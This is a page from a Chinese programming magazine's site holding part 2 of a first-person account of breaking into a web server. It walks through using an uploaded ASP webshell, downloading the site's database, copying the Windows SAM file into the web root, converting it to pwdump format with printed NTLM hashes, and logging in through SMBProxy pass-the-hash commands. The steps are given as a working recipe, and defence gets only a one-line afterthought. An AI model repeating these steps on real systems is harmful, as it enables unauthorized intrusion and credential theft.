你好,欢迎来到电脑编程技巧与维护杂志社! 杂志社简介广告服务读者反馈编程社区  
合订本订阅
 
 
您的位置:技术专栏 / Linux开发
一次用ASP页面漏洞引发的渗透攻击(2)
 

我上传了ASP木马,系统自动编号了。01090208.asp呵呵,问题在哪里呢?来找一找……头大!又是动脑思考的时候了。看看他的数据库吧!于是……

http://www.target.net/data/ 不错!您没有权限…… 哈哈 原来真在这里啊!再试!

http://www.target.net/data/database.mdb 没有找到文件

http://www.target.net/data/target.mdb 嗯!行了!下载下来看!

呵呵!里面由用户列表、文章列表、还有系统统计——要的就是它!哈!果然找到了,01090208.asp的绝对路径就在里面,好,输入到浏览器里面看看……出来了!

[img]/UpLoadFiles/NewsPhoto/a5_885_1.jpg[/img]

好!copy SAM文件到网页根目录下载,在命令行里面输入:

copy d:\winnt\repair\sam e:\www.target.net\sam._

已成功复制1个文件,好了,在浏览器里面输入:

http://www.target.net/sam._

下载完毕……

下一步?LC4破解?不不!用新方法SMBProxy 登录!嘻嘻!新东西!

简介:

如果拿到一个远程主机NTLMHash密码信息, 一般都会使用暴力破解来获取密码,这个程序可以使用proxy方式与远程主机验证登陆,来达到快速进入的目的.

SMBProxy程序只认可pwdump格式的密码信息,LC格式不行,所以要将我得到的SAM文件转换为pwdump格式。

pwdump格式转换方法

先打开LC3,将SAM文件导入程序,随便选择一个模式进行破解,停止破解。

[img]/UpLoadFiles/NewsPhoto/5_885_19.jpg[/img]

将项目保存为LC3的文件格式——*.lcs。

使用SMBProxy自带的工具将LC格式的文件转换为pwdump格式。

E:\>perl lc3_conv.pl 2.lcs

Administrator:500:89B9639B628096295FBE6BDC86679876:C6EBC896A3C134D4CF18063C33ACC926:::

Guest:501:4316EDA750394C6B120438C30F7F1819:00000000000000000000000000000000:::

TsInternetUser:1000:1987DC7B3DE4A42761541729CD9CDFDD:28212D01DDEF0A91BA9022173515E9A6:::

…………………………

转换完毕

1. 停掉本机server服务,因为此程序默认使用127.0.0.1的139端口

net stop server

2. 运行本程序

smbproxy -s target -f pwdump3.txt 好了

3. 通过本地代理登陆远程主机

net use * \\127.0.0.1\c$ 123456/user:administrator

哈!成功!

其实,不用SMBProxy也只不过是为了快一点登录,使用LC4破解也是可行的,主要还是因为我很懒……

擦出了痕迹,归还了权限,我就撤退了,呵呵!

后记:关于ASP漏洞的补救,我不是很在行,只是提一些建议吧!

(编辑:aniston)

  推荐精品文章

·2024年12月目录 
·2024年11月目录 
·2024年10月目录 
·2024年9月目录 
·2024年8月目录 
·2024年7月目录 
·2024年6月目录 
·2024年5月目录 
·2024年4月目录 
·2024年3月目录 
·2024年2月目录 
·2024年1月目录
·2023年12月目录
·2023年11月目录

  联系方式
TEL:010-82561037
Fax: 010-82561614
QQ: 100164630
Mail:gaojian@comprg.com.cn

  友情链接
 
Copyright 2001-2010, www.comprg.com.cn, All Rights Reserved
京ICP备14022230号-1,电话/传真:010-82561037 82561614 ,Mail:gaojian@comprg.com.cn
地址:北京市海淀区远大路20号宝蓝大厦E座704,邮编:100089